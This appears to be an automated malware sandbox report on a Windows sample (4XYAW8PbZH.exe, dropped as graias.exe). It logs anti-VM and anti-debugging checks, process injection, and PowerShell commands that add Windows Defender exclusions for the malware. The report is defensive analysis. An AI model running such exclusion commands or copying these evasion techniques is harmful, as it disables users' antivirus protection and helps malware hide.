                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: graias.exe PID: 7188, type: MEMORYSTR
                Delayed program exit found
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0040E54F Sleep,ExitProcess,3_2_0040E54F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMemory allocated: 7CB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMemory allocated: 7590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMemory allocated: 8CB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMemory allocated: 9CB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 13B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 4EC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 7DA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 7680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 8DA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 9DA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_004198D2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5078Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 630Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7181
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2385
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeWindow / User API: threadDelayed 9263
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeWindow / User API: foregroundWindowGot 1531
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeEvaded block: after key decisiongraph_3-47121
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeEvaded block: after key decisiongraph_3-47097
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeEvaded block: after key decisiongraph_3-47101
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeAPI coverage: 5.8 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 7181 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 2385 > 30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7400Thread sleep count: 130 > 30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7400Thread sleep time: -65000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7404Thread sleep count: 9263 > 30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7404Thread sleep time: -27789000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7404Thread sleep count: 287 > 30
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7404Thread sleep time: -861000s >= -30000s
                Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040B335
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,3_2_0041B43F
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040B53A
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,3_2_004089A9
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00406AC2 FindFirstFileW,FindNextFileW,3_2_00406AC2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,3_2_00407A8C
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00418C79
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,3_2_00408DA7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00406F06
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: Amcache.hve.7.drBinary or memory string: VMware
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                Source: svchost.exe, 00000018.00000002.1912988651.0000000002E71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}n;
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: graias.exe, 0000000B.00000002.4169480576.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 0000000B.00000002.4171327260.0000000000CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 0000008C.00000002.3990411733.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: svchost.exe, 00000064.00000002.3204757473.000000000306C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: svchost.exe, 00000069.00000002.3284491300.000000000323F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: svchost.exe, 0000008C.00000002.3990411733.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: svchost.exe, 00000018.00000002.1912882043.0000000002E53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: svchost.exe, 00000014.00000002.1869527546.0000000003680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
                Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: svchost.exe, 00000064.00000002.3204512636.000000000303F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043A66D
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCF3
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00442564 mov eax, dword ptr fs:[00000030h]3_2_00442564
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0044E93E GetProcessHeap,3_2_0044E93E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00434178
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043A66D
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00433B54
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00433CE7 SetUnhandledExceptionFilter,3_2_00433CE7
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMemory written: C:\Users\user\Desktop\4XYAW8PbZH.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Users\user\AppData\Roaming\Graias\graias.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
